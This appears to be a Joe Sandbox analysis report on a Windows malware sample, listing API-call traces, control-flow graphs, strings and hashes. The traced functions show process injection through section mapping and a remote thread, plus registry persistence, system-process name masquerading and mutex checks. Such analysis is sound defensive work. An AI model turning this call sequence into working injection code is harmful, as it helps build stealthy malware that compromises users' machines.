20902->20895 20907 7dc033 CryptDestroyHash 20902->20907 20903->20895 20903->20902 20904 7dbf9e WaitForSingleObject 20904->20895 20905 7dbfbb CryptHashData 20904->20905 20905->20895 20905->20906 20906->20901 20906->20904 20906->20905 20907->20896 20947 7e359a __snwprintf 102 API calls 20946->20947 20948 7c4724 RegGetValueW 20947->20948 20949 7c45d2 20948->20949 20949->19189 20950 7c4650 20949->20950 20951 7c4675 _memset 20950->20951 20952 7e359a __snwprintf 102 API calls 20951->20952 20953 7c4693 RegCreateKeyExW 20952->20953 20954 7c46bf RegSetValueExW 20953->20954 20955 7c45e8 20953->20955 20956 7c46de RegCloseKey 20954->20956 20957 7c46ef RegCloseKey 20954->20957 20955->19192 20955->19194 20956->20955 20957->20955 20959 7c480f WaitForSingleObject 20958->20959 20961 7c483b 20958->20961 20960 7c4834 20959->20960 20959->20961 20962 7c4899 LocalFree 20961->20962 20963 7c4700 103 API calls 20961->20963 20965 7c4b9e 20961->20965 20966 7c4b80 WaitForSingleObject 20961->20966 20967 7d9150 90 API calls 20961->20967 20969 7c4b35 LocalFree 20961->20969 20970 7c4ab0 LocalFree 20961->20970 20972 7c4c30 20961->20972 20962->20961 20963->20961 20964 7c4bdd LocalFree 20964->20965 20965->20960 20965->20964 20966->20961 20966->20965 20967->20961 20969->20961 21003 7c4770 20970->21003 20973 7c4c55 _memset 20972->20973 20974 7c4cef _memset 20973->20974 20975 7c4c9f SHGetKnownFolderPath 20973->20975 20978 7c4d0b GetTempPathW 20974->20978 20976 7c4cc0 20975->20976 21002 7c4cb9 20975->21002 20978->21002 21002->20961 21004 7e359a __snwprintf 102 API calls 21003->21004 21005 7c4794 RegOpenKeyW 21004->21005 21006 7c47b5 RegSetValueExW 21005->21006 21007 7c47b1 21005->21007 21007->20961 21011 7dac9c PostMessageW 21010->21011 21012 7dacae 21010->21012 21011->21012 21013 7dacb7 WaitForSingleObject CloseHandle 21012->21013 21014 7d6d29 21012->21014 21013->21014 21014->18752 21014->18753 21016 7e359a __snwprintf 102 API calls 21015->21016 21017 7cb4c4 RegGetValueW 21016->21017 21018 7cb4f5 21017->21018 21018->18921 21018->18923 21020 7e359a __snwprintf 102 API calls 21019->21020 21021 7cb534 RegOpenKeyW 21020->21021 21022 7cb555 RegSetValueExW 21021->21022 21023 7cb551 21021->21023 21024 7cb580 RegCloseKey 21022->21024 21025 7cb572 RegCloseKey 21022->21025 21023->18923 21024->21023 21025->21023 21027 7dc59b GetFileSize 21026->21027 21028 7d430b 21026->21028 21029 7dc60a CloseHandle 21027->21029 21030 7dc5b0 LocalAlloc 21027->21030 21028->18928 21028->18931 21029->21028 21030->21029 21031 7dc5c5 ReadFile 21030->21031 21032 7dc5e1 21031->21032 21033 7dc600 LocalFree 21031->21033 21032->21033 21034 7dc5e9 CloseHandle 21032->21034 21033->21029 21034->21028 21074 7cfcfc SHGetKnownFolderPath 21073->21074 21074->19049 21074->19052 21084 7e9538 21081->21084 21083 7e969f 21085 7e9544 __mtinitlocknum 21084->21085 21086 7ec725 __lock 61 API calls 21085->21086 21087 7e954b 21086->21087 21089 7e9576 DecodePointer 21087->21089 21094 7e95f5 21087->21094 21091 7e958d DecodePointer 21089->21091 21089->21094 21103 7e95a0 21091->21103 21092 7e9672 __mtinitlocknum 21092->21083 21107 7e9663 21094->21107 21095 7e965a 21097 7e9420 __mtinitlocknum 3 API calls 21095->21097 21098 7e9663 21097->21098 21099 7e9670 21098->21099 21112 7ec64c LeaveCriticalSection 21098->21112 21099->21083 21100 7e95b7 DecodePointer 21106 7e800e EncodePointer 21100->21106 21103->21094 21103->21100 21104 7e95c6 DecodePointer DecodePointer 21103->21104 21105 7e800e EncodePointer 21103->21105 21104->21103 21105->21103 21106->21103 21108 7e9669 21107->21108 21109 7e9643 21107->21109 21113 7ec64c LeaveCriticalSection 21108->21113 21109->21092 21111 7ec64c LeaveCriticalSection 21109->21111 21111->21095 21112->21099 21113->21109 21114 7c58d5 21115 7c58ef RtlCreateUserThread 21114->21115 21118 7c592c 21115->21118 21119 7c6090 21120 7c609f 21119->21120 21121 7c60ad _strlen 21119->21121 21120->21121 21125 7c5cc0 21120->21125 21122 7c60fc X64Call 21121->21122 21124 7c60ca 21121->21124 21122->21124 21155 7c5c70 21125->21155 21127 7c5cf5 21127->21121 21128 7c5ce3 21128->21127 21129 7e4619 _malloc 66 API calls 21128->21129 21130 7c5d86 21129->21130 21130->21127 21131 7e4619 _malloc 66 API calls 21130->21131 21132 7c5de5 21131->21132 21133 7c5df7 21132->21133 21135 7c5e2b 21132->21135 21159 7c6810 21133->21159 21136 7e4619 _malloc 66 API calls 21135->21136 21137 7c5e6c 21136->21137 21138 7c5e7e 21137->21138 21145 7c5ebe 21137->21145 21139 7c6810 66 API calls 21138->21139 21140 7c5e9e 21139->21140 21141 7c6810 66 API calls 21140->21141 21141->21127 21142 7c5fb8 21143 7c6810 66 API calls 21142->21143 21144 7c5fd8 21143->21144 21147 7c6810 66 API calls 21144->21147 21145->21142 21146 7c5f51 21145->21146 21148 7c6810 66 API calls 21146->21148 21149 7c5fe4 21147->21149 21151 7c5f8a 21148->21151 21150 7c6810 66 API calls 21149->21150 21150->21127 21152 7c6810 66 API calls 21151->21152 21153 7c5f96 21152->21153 21154 7c6810 66 API calls 21153->21154 21154->21127 21156 7c5c7c 21155->21156 21157 7c5c85 21155->21157 21156->21157 21158 7c5c92 GetModuleHandle64 21156->21158 21157->21128 21158->21157 21160 7c6839 21159->21160 21161 7c6821 21159->21161 21160->21127 21161->21160 21162 7e46ad _free 66 API calls 21161->21162 21162->21160

                                                                            Executed Functions

                                                                            Function 007C1000 Relevance: 202.0, APIs: 100, Strings: 15, Instructions: 724COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 007D8110: LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 007D811E
                                                                            • ExitProcess.KERNEL32 ref: 007C103F
                                                                            • _memset.LIBCMT ref: 007C105C
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007C1072
                                                                            • ExitProcess.KERNEL32 ref: 007C107E
                                                                            Strings
                                                                            • {650443EC-0EFE-4819-82E8-5F93F6D2E6A5}, xrefs: 007C10D1
                                                                            • {F064C698-006D-4351-BA2C-625A53964F8D}, xrefs: 007C149F
                                                                            • %s\svchost.exe, xrefs: 007C1744
                                                                            • {04D458D6-7C6C-445F-AEAD-313D698F1F0A}, xrefs: 007C19DF
                                                                            • {36B5A614-B027-4841-8B7A-585CE588BF9D}, xrefs: 007C1149, 007C1964
                                                                            • {F95B00D0-572A-45B1-BD9B-5DB7078A4AC4}, xrefs: 007C1A5D
                                                                            • {EF67FEC6-3B78-4CEC-ADF5-E05B5411BD4E}, xrefs: 007C12D3
                                                                            • {C3397568-8840-4085-8F6E-BC07C085BB3B}, xrefs: 007C130E, 007C1334
                                                                            • {9A30B3AA-5D5B-4418-94BC-EA9A5585D123}, xrefs: 007C14D1
                                                                            • %s\cmd.exe, xrefs: 007C1788
                                                                            • {54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}, xrefs: 007C1117, 007C1341, 007C1368
                                                                            • {BBE56B4F-CBD4-4E5B-AF23-B7BA3CDDF0CA}, xrefs: 007C14B8
                                                                            • {CCEFB138-B038-41E1-AC53-171A4E58AB6A}, xrefs: 007C11B4, 007C11EA
                                                                            • {C55632B1-A307-4128-9468-89792C176C2F}, xrefs: 007C1ADC
                                                                            • %s\explorer.exe, xrefs: 007C1703
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExitProcess$FileLibraryLoadModuleName_memset
                                                                            • String ID: %s\cmd.exe$%s\explorer.exe$%s\svchost.exe${04D458D6-7C6C-445F-AEAD-313D698F1F0A}${36B5A614-B027-4841-8B7A-585CE588BF9D}${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${650443EC-0EFE-4819-82E8-5F93F6D2E6A5}${9A30B3AA-5D5B-4418-94BC-EA9A5585D123}${BBE56B4F-CBD4-4E5B-AF23-B7BA3CDDF0CA}${C3397568-8840-4085-8F6E-BC07C085BB3B}${C55632B1-A307-4128-9468-89792C176C2F}${CCEFB138-B038-41E1-AC53-171A4E58AB6A}${EF67FEC6-3B78-4CEC-ADF5-E05B5411BD4E}${F064C698-006D-4351-BA2C-625A53964F8D}${F95B00D0-572A-45B1-BD9B-5DB7078A4AC4}
                                                                            • API String ID: 3630785697-3688416082
                                                                            • Opcode ID: 5b500a7ed035ac9c4b9d71381fe93ee49b5789adefea8792349dd82e797f1d7f
                                                                            • Instruction ID: 82177fc17e21716b0112d74f810aac290c314367be4c18b80b13cc8e18b6a782
                                                                            • Opcode Fuzzy Hash: 5b500a7ed035ac9c4b9d71381fe93ee49b5789adefea8792349dd82e797f1d7f
                                                                            • Instruction Fuzzy Hash: 8F6270B0A40218DBEB209F60EC8DF9977B5BF85705F5044BDF609A6291DBB89AC0CF51
                                                                            Function 007D38D0 Relevance: 147.5, APIs: 66, Strings: 18, Instructions: 544nativestringprocessCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 241 7d38d0-7d3993 GetCurrentProcess Wow64DisableWow64FsRedirection call 7e3520 lstrcpyW call 7c1c60 call 7e3520 CreateProcessW 248 7d3999-7d3a1e NtCreateSection 241->248 249 7d4164-7d4171 Wow64DisableWow64FsRedirection 241->249 251 7d414a-7d415e CloseHandle * 2 248->251 252 7d3a24-7d3a73 GetCurrentProcess NtMapViewOfSection 248->252 250 7d4173-7d4176 249->250 251->249 253 7d413d-7d4144 NtClose 252->253 254 7d3a79-7d3abe NtMapViewOfSection 252->254 253->251 255 7d412c-7d4137 NtUnmapViewOfSection 254->255 256 7d3ac4-7d3b19 NtCreateSection 254->256 255->253 257 7d3b1f-7d3b70 GetCurrentProcess NtMapViewOfSection 256->257 258 7d4118-7d4126 NtUnmapViewOfSection 256->258 259 7d410b-7d4112 NtClose 257->259 260 7d3b76-7d3bbb NtMapViewOfSection 257->260 258->255 259->258 261 7d40fa-7d4105 NtUnmapViewOfSection 260->261 262 7d3bc1-7d3c0a NtCreateSection 260->262 261->259 263 7d40e6-7d40f4 NtUnmapViewOfSection 262->263 264 7d3c10-7d3c5e GetCurrentProcess NtMapViewOfSection 262->264 263->261 265 7d40d9-7d40e0 NtClose 264->265 266 7d3c64-7d3ca9 NtMapViewOfSection 264->266 265->263 267 7d3caf-7d3ed8 call 7e3ad0 call 7df4c0 call 7e3ad0 call 7df4c0 call 7e3ad0 lstrcpyW * 2 lstrcpyA * 11 call 7e3ad0 CreateEventW 266->267 268 7d40c8-7d40d3 NtUnmapViewOfSection 266->268 281 7d3ede-7d3f8e call 7c5720 GetModuleHandle64 GetProcAddress64 X64Call 267->281 282 7d40b4-7d40c2 NtUnmapViewOfSection 267->282 268->265 285 7d409a-7d40ae ResetEvent CloseHandle 281->285 286 7d3f94-7d3fc3 WaitForSingleObject ResetEvent 281->286 282->268 285->282 286->285 287 7d3fc9-7d4095 NtUnmapViewOfSection * 6 NtClose * 3 CloseHandle Wow64DisableWow64FsRedirection 286->287 287->250
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 007D38D9
                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 007D38E9
                                                                            • _memset.LIBCMT ref: 007D3906
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 007D3919
                                                                              • Part of subcall function 007C1C60: _wcsrchr.LIBCMT ref: 007C1C6C
                                                                            • _memset.LIBCMT ref: 007D3940
                                                                            • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,?,00000044,?), ref: 007D398A
                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,000005F0,00000004,08000000,00000000), ref: 007D3A0B
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,000005F0,00000002,00000000,00000004), ref: 007D3A52
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007D3A60
                                                                            • NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,000005F0,00000002,00000000,00000004), ref: 007D3AAB
                                                                            • NtCreateSection.NTDLL(00000000,0000000E,00000000,?,00000040,08000000,00000000), ref: 007D3B06
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 007D3B4F
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007D3B5D
                                                                            • NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 007D3BA8
                                                                            • NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 007D3BF7
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 007D3C3D
                                                                            • NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007D3C4B
                                                                            • NtMapViewOfSection.NTDLL(00000000,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 007D3C96
                                                                            • _memmove.LIBCMT ref: 007D3CBE
                                                                            • _memmove.LIBCMT ref: 007D3CF7
                                                                            • _memmove.LIBCMT ref: 007D3D30
                                                                            • lstrcpyW.KERNEL32(?,KERNEL32.DLL), ref: 007D3D50
                                                                            • lstrcpyW.KERNEL32(?,USER32.DLL), ref: 007D3D68
                                                                            • lstrcpyA.KERNEL32(?,LoadLibraryW), ref: 007D3D80
                                                                            • lstrcpyA.KERNEL32(?,GetProcAddress), ref: 007D3D97
                                                                            • lstrcpyA.KERNEL32(?,Sleep), ref: 007D3DAF
                                                                            • lstrcpyA.KERNEL32(?,LoadLibraryA), ref: 007D3DC7
                                                                            • lstrcpyA.KERNEL32(?,LocalAlloc), ref: 007D3DDE
                                                                            • lstrcpyA.KERNEL32(?,VirtualAlloc), ref: 007D3DF6
                                                                            • lstrcpyA.KERNEL32(?,LocalFree), ref: 007D3E0E
                                                                            • lstrcpyA.KERNEL32(?,CloseHandle), ref: 007D3E25
                                                                            • lstrcpyA.KERNEL32(?,VirtualFree), ref: 007D3E3D
                                                                            • lstrcpyA.KERNEL32(?,MessageBoxW), ref: 007D3E55
                                                                            • lstrcpyA.KERNEL32(?,VirtualProtect), ref: 007D3E6C
                                                                            • _memmove.LIBCMT ref: 007D3EA9
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,?), ref: 007D3EC5
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D40C2
                                                                              • Part of subcall function 007C5720: GetCurrentProcess.KERNEL32(0083CB2C,?,007D3EE3), ref: 007C5728
                                                                              • Part of subcall function 007C5720: IsWow64Process.KERNEL32(00000000,?,007D3EE3), ref: 007C572F
                                                                              • Part of subcall function 007C5720: GetProcessHeap.KERNEL32(?,007D3EE3), ref: 007C5735
                                                                            • GetModuleHandle64.FILE(NTDLL.DLL), ref: 007D3EE8
                                                                            • GetProcAddress64.FILE(?,?,RtlCreateUserThread), ref: 007D3F0F
                                                                            • X64Call.FILE(?,?,0000000A,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007D3F79
                                                                            • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 007D3FA0
                                                                            • ResetEvent.KERNEL32(00000000), ref: 007D3FB3
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D3FD7
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D3FEB
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D3FFF
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4010
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4021
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4032
                                                                            • NtClose.NTDLL(00000000), ref: 007D403F
                                                                            • NtClose.NTDLL(00000000), ref: 007D404C
                                                                            • NtClose.NTDLL(00000000), ref: 007D4059
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D4066
                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 007D4073
                                                                            • ResetEvent.KERNEL32(00000000), ref: 007D40A1
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D40AE
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D40D3
                                                                            • NtClose.NTDLL(00000000), ref: 007D40E0
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D40F4
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4105
                                                                            • NtClose.NTDLL(00000000), ref: 007D4112
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4126
                                                                            • NtUnmapViewOfSection.NTDLL(?,00000000), ref: 007D4137
                                                                            • NtClose.NTDLL(00000000), ref: 007D4144
                                                                            • CloseHandle.KERNEL32(?), ref: 007D4151
                                                                            • CloseHandle.KERNEL32(?), ref: 007D415E
                                                                            • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 007D416B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Section$View$lstrcpy$Unmap$Close$Process$Wow64$CreateCurrent$Handle_memmove$DisableEventRedirection$Reset_memset$Address64CallHandle64HeapModuleObjectProcSingleWait_wcsrchr
                                                                            • String ID: 777367648777262762$897878765347627341$CloseHandle$D$GetProcAddress$KERNEL32.DLL$LoadLibraryA$LoadLibraryW$LocalAlloc$LocalFree$MessageBoxW$NTDLL.DLL$RtlCreateUserThread$Sleep$USER32.DLL$VirtualAlloc$VirtualFree$VirtualProtect
                                                                            • API String ID: 456155699-117320160
                                                                            • Opcode ID: fe17094a1b952a917292764cee2b03b6ff089e08f5a4fdfc880f80eaac9c3724
                                                                            • Instruction ID: bceda8a587c3765947c59674bd6d94f13b3fc994084de720cc61d914daa49984
                                                                            • Opcode Fuzzy Hash: fe17094a1b952a917292764cee2b03b6ff089e08f5a4fdfc880f80eaac9c3724
                                                                            • Instruction Fuzzy Hash: 1C323CB1A41219AFDB24DB64DC8DFAAB774BB48700F1085D9F609B7290DB74AE80CF54
                                                                            Function 007D8110 Relevance: 125.2, APIs: 51, Strings: 20, Instructions: 993libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(NTDLL.DLL), ref: 007D811E
                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 007D8181
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: 5$ADVAPI32.DLL$CRYPT32.DLL$DBGHELP.DLL$GDI32.DLL$GDIPLUS.DLL$H$KERNEL32.DLL$MSI.DLL$NTDLL.DLL$OLE32.DLL$SECUR32.DLL$SHELL32.DLL$SHLWAPI.DLL$USER32.DLL$WINHTTP.DLL$WINMM.DLL$WS2_32.DLL$WTSAPI32.DLL$n
                                                                            • API String ID: 2574300362-974314553
                                                                            • Opcode ID: b13546062a763055eed97cb51226b17882952ce312bba5b1b9244657a51536be
                                                                            • Instruction ID: 4f76d727fdf518da6e1009deb9dfa5942bc550c8622d8bed7858fdf6f7929465
                                                                            • Opcode Fuzzy Hash: b13546062a763055eed97cb51226b17882952ce312bba5b1b9244657a51536be
                                                                            • Instruction Fuzzy Hash: 96A249B4A05219DFCBA4DF64DD48BA9B7B5FB48301F1084DAE50AA3340DB39AE85CF51
                                                                            Function 007D41E0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 61registrytimeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 727 7d41e0-7d422e call 7e359a RegCreateKeyExW 730 7d4234-7d425c RegCloseKey call 7e3520 call 7cb4a0 727->730 731 7d4230-7d4232 727->731 737 7d425e-7d4280 GetSystemTime SystemTimeToFileTime call 7cb510 730->737 738 7d4290 730->738 732 7d4295-7d4298 731->732 740 7d4285-7d428a 737->740 738->732 740->738 741 7d428c-7d428e 740->741 741->732
                                                                            APIs
                                                                            • __snwprintf.LIBCMT ref: 007D41FF
                                                                            • RegCreateKeyExW.KERNELBASE(80000001,?,00000000,00000000,00000000,000F013F,00000000,007C1585,00000000), ref: 007D4226
                                                                            • RegCloseKey.KERNELBASE(007C1585), ref: 007D4238
                                                                            • _memset.LIBCMT ref: 007D4246
                                                                            • GetSystemTime.KERNEL32(?), ref: 007D4265
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 007D4276
                                                                            Strings
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007D41E9
                                                                            • SOFTWARE\%s, xrefs: 007D41EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Time$System$CloseCreateFile__snwprintf_memset
                                                                            • String ID: SOFTWARE\%s${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 3491885642-1408172494
                                                                            • Opcode ID: 1d58223e513d7361c09babdf07f32164a1e1333e34dc411b801bcc0b0cfdeaae
                                                                            • Instruction ID: b4eb743cc558b84af5231ce4a01d2bc390790671c8a5de6a8dfcfcb8f65a91f7
                                                                            • Opcode Fuzzy Hash: 1d58223e513d7361c09babdf07f32164a1e1333e34dc411b801bcc0b0cfdeaae
                                                                            • Instruction Fuzzy Hash: ED117376A80309BBEB14D7B0EC4EFFA733CBB54700F000958B615E6181FAB9A654C7A1
                                                                            Function 007D00A0 Relevance: 89.5, APIs: 42, Strings: 9, Instructions: 229stringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 528 7d00a0-7d00d4 GetCommandLineW CommandLineToArgvW lstrcmpiW 529 7d00e5-7d00f9 lstrcmpiW 528->529 530 7d00d6-7d00e0 528->530 532 7d00ff-7d0112 IsUserAnAdmin 529->532 533 7d01c6-7d01da lstrcmpiW 529->533 531 7d03e9 530->531 538 7d03ee-7d03f1 531->538 536 7d016c-7d016e ExitProcess 532->536 537 7d0114-7d0134 OpenEventW 532->537 534 7d02a5-7d02b9 lstrcmpiW 533->534 535 7d01e0-7d01f9 OpenMutexW 533->535 543 7d02bf-7d02d8 OpenMutexW 534->543 544 7d037e-7d0392 lstrcmpiW 534->544 539 7d01fb-7d020e WaitForSingleObject CloseHandle 535->539 540 7d0214-7d022d OpenMutexW 535->540 541 7d0136-7d0142 SetEvent 537->541 542 7d0162-7d0164 ExitProcess 537->542 539->540 545 7d022f-7d0242 WaitForSingleObject CloseHandle 540->545 546 7d0248-7d024f 540->546 548 7d0144-7d0150 CloseHandle ExitProcess 541->548 549 7d0156-7d016a CloseHandle 541->549 550 7d02da-7d02ed WaitForSingleObject CloseHandle 543->550 551 7d02f3-7d030c OpenMutexW 543->551 544->531 547 7d0394-7d039b 544->547 545->546 552 7d028b-7d029b Sleep 546->552 553 7d0251-7d0271 OpenMutexW 546->553 554 7d039d-7d03bd OpenMutexW 547->554 555 7d03d7-7d03e7 Sleep 547->555 563 7d0174-7d017b 549->563 550->551 557 7d030e-7d0321 WaitForSingleObject CloseHandle 551->557 558 7d0327-7d032e 551->558 552->538 559 7d0287 553->559 560 7d0273-7d0285 CloseHandle Sleep 553->560 561 7d03bf-7d03d1 CloseHandle Sleep 554->561 562 7d03d3 554->562 555->538 557->558 564 7d036a-7d037a Sleep 558->564 565 7d0330-7d0350 OpenMutexW 558->565 559->552 560->546 561->547 562->555 568 7d017d-7d019d OpenMutexW 563->568 569 7d01b7-7d01bc 563->569 564->538 566 7d0366 565->566 567 7d0352-7d0364 CloseHandle Sleep 565->567 566->564 567->558 570 7d019f-7d01b1 CloseHandle Sleep 568->570 571 7d01b3 568->571 569->538 570->563 571->569
                                                                            APIs
                                                                            • GetCommandLineW.KERNEL32 ref: 007D00A6
                                                                            • CommandLineToArgvW.SHELL32(?,?), ref: 007D00B7
                                                                            • lstrcmpiW.KERNELBASE(?,{741330C7-73F4-49B6-9258-6679317DED46}), ref: 007D00CC
                                                                            • lstrcmpiW.KERNEL32(?,{4042FD4A-C237-4861-80BD-1FA24BEF8CE4}), ref: 007D00F1
                                                                            • IsUserAnAdmin.SHELL32 ref: 007D0109
                                                                            • OpenEventW.KERNEL32(00100002,00000000,{F6FB16F6-69D4-4502-9E85-2E5E52F61D5C}), ref: 007D0127
                                                                            • SetEvent.KERNEL32(00000000), ref: 007D013A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D0148
                                                                            • ExitProcess.KERNEL32 ref: 007D0150
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
